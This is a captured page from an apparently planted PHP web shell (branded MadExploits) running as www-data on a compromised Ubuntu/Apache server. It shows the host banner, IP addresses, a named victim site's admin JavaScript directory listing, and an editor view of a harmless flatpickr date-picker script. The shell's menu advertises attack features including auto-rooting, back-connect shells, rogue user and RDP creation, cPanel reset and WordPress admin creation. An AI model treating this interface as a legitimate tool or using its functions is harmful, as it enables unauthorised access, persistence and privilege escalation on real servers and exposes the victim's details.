Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.114.232
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
fastspeedlinks.com /
assets /
admin /
theme /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
apexchart
[ DIR ]
drwxr-xr-x
bookmark
[ DIR ]
drwxr-xr-x
chartist
[ DIR ]
drwxr-xr-x
chartjs
[ DIR ]
drwxr-xr-x
choices.js
[ DIR ]
drwxr-xr-x
clipboard
[ DIR ]
drwxr-xr-x
contacts
[ DIR ]
drwxr-xr-x
counter
[ DIR ]
drwxr-xr-x
custom-card
[ DIR ]
drwxr-xr-x
dashboard
[ DIR ]
drwxr-xr-x
datatable
[ DIR ]
drwxr-xr-x
datepicker
[ DIR ]
drwxr-xr-x
dropzone
[ DIR ]
drwxr-xr-x
editor
[ DIR ]
drwxr-xr-x
emoji-js
[ DIR ]
drwxr-xr-x
filepond
[ DIR ]
drwxr-xr-x
form-wizard
[ DIR ]
drwxr-xr-x
fullcalendar
[ DIR ]
drwxr-xr-x
general-widget
[ DIR ]
drwxr-xr-x
icons
[ DIR ]
drwxr-xr-x
img-cropper
[ DIR ]
drwxr-xr-x
jkanban
[ DIR ]
drwxr-xr-x
jsgrid
[ DIR ]
drwxr-xr-x
landing
[ DIR ]
drwxr-xr-x
letter-box
[ DIR ]
drwxr-xr-x
masonry
[ DIR ]
drwxr-xr-x
modal
[ DIR ]
drwxr-xr-x
notify
[ DIR ]
drwxr-xr-x
photoswipe
[ DIR ]
drwxr-xr-x
pikaday
[ DIR ]
drwxr-xr-x
prism
[ DIR ]
drwxr-xr-x
product
[ DIR ]
drwxr-xr-x
rangeslider
[ DIR ]
drwxr-xr-x
rating
[ DIR ]
drwxr-xr-x
scrollable
[ DIR ]
drwxr-xr-x
scrollbar
[ DIR ]
drwxr-xr-x
select2
[ DIR ]
drwxr-xr-x
sweetalert
[ DIR ]
drwxr-xr-x
swiper
[ DIR ]
drwxr-xr-x
theme-customizer
[ DIR ]
drwxr-xr-x
timeline
[ DIR ]
drwxr-xr-x
tree
[ DIR ]
drwxr-xr-x
two-factor
[ DIR ]
drwxr-xr-x
vector-map
[ DIR ]
drwxr-xr-x
vendors
[ DIR ]
drwxr-xr-x
widget
[ DIR ]
drwxr-xr-x
alert.js
755
B
-rw-r--r--
aos-init.js
11
B
-rw-r--r--
common-chat.js
1.92
KB
-rw-r--r--
config.js
977
B
-rw-r--r--
countdown.js
706
B
-rw-r--r--
custom-flatpickr.js
2.13
KB
-rw-r--r--
custom-quill.js
522
B
-rw-r--r--
datamap-custom.js
6.04
KB
-rw-r--r--
draggable-custom.js
148
B
-rw-r--r--
form-validation-custom.js
628
B
-rw-r--r--
gallery-mixin.js
87
B
-rw-r--r--
height-equal.js
885
B
-rw-r--r--
md-sidebar.js
361
B
-rw-r--r--
modernizr.js
7.34
KB
-rw-r--r--
password.js
572
B
-rw-r--r--
popover-custom.js
293
B
-rw-r--r--
print.js
60
B
-rw-r--r--
script.js
5.08
KB
-rw-r--r--
sidebar.js
7.44
KB
-rw-r--r--
support-custom.js
107
B
-rw-r--r--
tooltip-custom.js
294
B
-rw-r--r--
tour-custom.js
151
B
-rw-r--r--
translate-custom.js
3.54
KB
-rw-r--r--
validation-modal.js
606
B
-rw-r--r--
wow-custom.js
187
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom-flatpickr.js
// Custom-flatpickr JS (function () { // 1. Default Date flatpickr("#datetime-local", {}); // 2.Human Friendly flatpickr("#human-friendly", { altInput: true, altFormat: "F j, Y", dateFormat: "Y-m-d", }); //3. min-max value flatpickr("#min-max", { dateFormat: "d.m.Y", maxDate: "15.12.2017", }); // 4. disabled-date flatpickr("#disabled-date", { disable: ["2025-01-30", "2025-02-21", "2025-03-08", new Date(2025, 4, 9)], dateFormat: "Y-m-d", }); //5. multiple-date flatpickr("#multiple-date", { mode: "multiple", dateFormat: "Y-m-d", }); // 6. Customizing the Conjunction flatpickr("#customize-date", { mode: "multiple", dateFormat: "Y-m-d", conjunction: " :: ", }); // 7.Range-date flatpickr("#range-date", { mode: "range", }); // 8. Disabled Range flatpickr("#preloading-date", { mode: "multiple", dateFormat: "Y-m-d", defaultDate: ["2016-10-20", "2016-11-04"], }); // Time-picker //9.Time-picker flatpickr("#time-picker", { enableTime: true, noCalendar: true, dateFormat: "H:i", }); // 10. 24-hour Time Picker flatpickr("#twenty-four-hour", { enableTime: true, noCalendar: true, dateFormat: "H:i", time_24hr: true, }); // 11. Time Picker W/Limits flatpickr("#limit-time", { enableTime: true, noCalendar: true, dateFormat: "H:i", minTime: "16:00", maxTime: "22:30", }); // 12. Preloading Time flatpickr("#preloading-time", { enableTime: true, noCalendar: true, dateFormat: "H:i", defaultDate: "13:45", }); // 13. DateTimePicker with Limited Time Range[min-time] flatpickr("#limit-time-range", { enableTime: true, minTime: "09:00", }); // 14. DateTimePicker with Limited Time Range[min/max-time] flatpickr("#limit-min-max-range", { enableTime: true, minTime: "16:00", maxTime: "22:00", }); // 15. Date With Time flatpickr("#datetime-local1", { enableTime: true, dateFormat: "Y-m-d H:i", }); // 16. monthSelectPlugin //By-default- Inline Calender flatpickr("#inline-calender", { inline: true, }); })();
Close